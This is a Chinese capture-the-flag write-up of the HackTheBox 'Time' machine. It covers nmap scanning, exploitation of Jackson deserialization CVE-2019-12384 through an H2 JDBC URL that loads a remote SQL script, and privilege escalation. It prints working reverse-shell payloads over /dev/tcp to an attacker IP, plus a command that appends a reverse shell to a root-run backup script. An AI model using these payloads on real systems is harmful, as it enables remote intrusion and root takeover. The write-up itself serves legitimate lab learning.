HackTheBox::Time

本文详细讲述了如何通过Nmap扫描发现目标系统中的RCE漏洞,并利用CVE-2019-12384创建恶意SQL注入,最终获取到远程shell。涉及技术包括JSON解析器、输入验证绕过、RCE漏洞利用及权限提升方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 信息收集

nmap -Pn -p- -T4 --min-rate=1000 10.10.10.214
image.png
nmap -Pn -sCV -p 22,80 10.10.10.214
image.png
打开80端口查看页面,只有一个输入框功能,根据title看出是一个json解析器
image.png
尝试对路径进行爆破,未发现可利用的地方。

0x01 漏洞利用

尝试进行输入,在第二种模式下输入产生了报错。
image.png
Google搜索 com.fasterxml.jackson.core 发现存在RCE
image.png
利用方式
https://github.com/jas502n/CVE-2019-12384
创建一个inject.sql文件,内容如下

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.16/4444 0>&1')

image.png
开启http服务后,在网页输入框中执行如下命令

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.16:8000/inject.sql'"}]

成功得到shell
image.png

0x02 权限提升

上传linpeas.sh文件至目标机器
发现一个权限可疑的备份脚本
image.png
image.png
直接写入弹shell的命令

echo -e '\nbash -i >& /dev/tcp/10.10.14.16/4433 0>&1' >> /usr/bin/timer_backup.sh

image.png
这个shell不是很稳定,大概10s左右就会断开。
另一种稳定的shell思路,在脚本中mkdir一个.ssh文件,然后ssh登录。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值